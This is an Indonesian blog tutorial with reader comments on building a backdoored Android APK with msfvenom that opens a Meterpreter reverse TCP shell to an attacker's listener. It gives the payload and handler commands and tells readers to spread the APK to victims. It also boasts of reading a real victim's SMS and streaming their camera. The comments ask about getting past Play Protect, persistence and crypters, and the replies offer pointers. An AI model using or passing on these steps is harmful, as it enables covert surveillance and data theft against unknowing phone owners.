Exploit Android dengan Metasploit

Exploit ini menggunakan metode dengan menyisipkan shell ke dalam apk (injeksi).

Buat temen temen harap hati hati kalau mau download dan install aplikasi, karena dengan di injeksi shell, si attacker dapat melakukan exploit/remote/dll kapan saja ketika android terhubung ke internet (meterpreter opened). Apalagi di android yang jarang di lakukan scan antivirus secara berkala.

Exploit Android dengan Metasploit Kali Linux
Pertama tama kita buat terlebih dahulu backdoor beserta apknya

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.186 LPORT=4444 R > mymastahh.apk

192.168.43.186 adalah ip address komputer saya (listener), silahkan disesuaikan dengan ip address milik kalian.
mymastahh.apk merupakan nama aplikasi, silahkan diganti juga sesuai keinginan.

 File apk akan tersimpan di direktori Home

Mari kita jalankan metasploit

msfconsole

Lalu masukkan perintah berikut untuk memulai exploitnya

use exploit/multi/handler
set payload android/metepreter/reverse_tcp
set lhost 192.168.43.186
set lport 4444
exploit

Ganti 192.168.43.186 dengan ip address kalian, seperti saat membuat backdoor tadi

Sekarang sebarkan apk yang sudah kalian sisipkan backdoor
πŸ™‚

Setelah sekian lama menunggu, akirnya ada korban yang sudah menginstall dan membuka aplikasi terinjeksi backdoor buatan saya :v
Status metepreter session sudah opened, saya sudah memiliki akses penuh terhadap android korban, wkwkwk:v

Info spesifikasi android korban

Log sms android korban
wkwkkwkw kasihan amat kuotanya sudah habis :v

Untuk melihat streaming dari kamera korban gunakan perintah

webcam_stream

Mouse nya nyala :v
Sticker gopro nya bagus juga yak :3

Related Posts

31 Comments

  1. wah keren gan. tolong ajarin donk ane sering gagal nih. cara ngirim backdoornya gimana yaa? lewat apa soalnya saya gagal waktu exploitnya. thanks ditunggu

  2. Bisa :D. Karena di web ini belum ada tutorialnya, silahkan cari di google dulu ya XD. Keyword > How to binding payload meterpreter in to any apk, how to exploit payload meterpreter in to apk, how to embed payload meterpreter into Apk. Supaya lebih mudah coba nyimak video tutorial dari youtube

  3. bang klo waktu di install Parse Error "There was a problem parsing the package" itu kenapa ya?
    ane coba pake 2 HH satu OS 6.0.1 sama 7
    apa pengaruh versi android nya?
    biar support smua versi OS gimana?

  4. itu gara gara security di system androidnya. Hp bagus susah ditembus kwkw
    Kalau pingin coba simulasi saja, coba cek menu Security di androidmu.
    Hilangin centang di ceklist App permission.
    Soalnya payload yg kita buat dari msf dari awal memang masih polosan, wajar aja udah kehadang sama system (padahal belum ada AV nya kwkw)

  5. Buat payload msf support semua versi Android bisa cari keyword di google > how create persistance back door android atau how create crypter fud for back door msf android
    Tanya bagaimana caranya? bakal panjang jelasinnya. Ilmunya luas banget, harus paham pemrograman juga

  6. hi my mastah.. ini kan 1 jaringan yak, kalau misal saya pasang di server VPS dengan jaringan vps trs saya buat payload di vps menggunakan IP public vps, dan kirim backdoor ke target, apa simulasi seperti itu bisa jadi beda jaringan?

  7. Bisa banget mas πŸ˜€
    Kalau pingin jalankan di pc sendiri bisa nyoba vpn (support port forwarding) atau Router yang ada fitur port forwardingnya

  8. Kak kenapa apk nya gak ada terus bacaan nya no platform was selected, choosing msf.:module::platform::android from the payload mohon di jawab kak

  9. min mau tanya, pas ketik exploit kan nampilin kalimat seperti ini "Started reverse TCP handler" Nah pas gw download backdoornya dan udh gw matikan fitur play protect. Kok tetap gak dapetin sessions hp target ya? Solusinya gimana min?

  10. Beda jaringan gimna ya bang? Bang sekalian gw mau tanya pembuatan file Exploit nya itu sekali apa harus buat lagi kalo mau Exploit lagi? Tutornya bang capek buat2 file Exploit Mulu berkali2 kalo mau Exploit korban

Leave a Reply

Your email address will not be published. Required fields are marked *


The reCAPTCHA verification period has expired. Please reload the page.